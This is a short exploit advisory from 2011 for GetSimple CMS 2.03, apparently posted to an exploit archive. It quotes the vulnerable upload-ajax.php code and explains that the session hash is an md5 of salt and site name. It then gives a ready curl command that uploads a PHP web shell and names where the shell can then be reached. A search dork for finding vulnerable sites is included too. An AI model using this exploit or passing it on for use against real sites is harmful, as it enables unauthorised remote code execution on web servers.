# Exploit Title: GetSimple CMS <=2.03 Remote Upload Shell (0day) # Google Dork: "powered by GetSimple Version 2.03" # Date: 15/FEB/2011 # Author: s3rg3770 and Chuzz (irc.azzurra.org #hackerjournal) # Site Author: http://reflective.noblogs.org (OWL?) (\___/) (o\ /o) /|:.V.:|\ \\:::::// -----`"" ""`----- # Software Link: http://get-simple.info/ # Version: 2.0.3 # Tested on: *nix ---------------------------------------------------------------------- [INFO] What a Fuck? SESSIONHASH for upload a file? It's a bacon's security... Bug Code: getsimple/admin/upload-ajax.php if ($_REQUEST['sessionHash'] === $SESSIONHASH) { if (!empty($_FILES)) { $tempFile = $_FILES['Filedata']['tmp_name']; $name = clean_img_name($_FILES['Filedata']['name']); $targetPath = GSDATAUPLOADPATH; $targetFile = str_replace(‘//’,'/’,$targetPath) . $name; move_uploaded_file($tempFile, $targetFile); ---------------------------------------------------------------------- Generating SESSIONHASH: md5( $salt. $sitename) [XPL] curl -F “Filedata=@yourshell.txt;filename=shell.php” http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO After, enjoy your Bacon-Shell here ...http://getsimple_localhost/ data/uploads/shell.php Thanks to my ASCELL...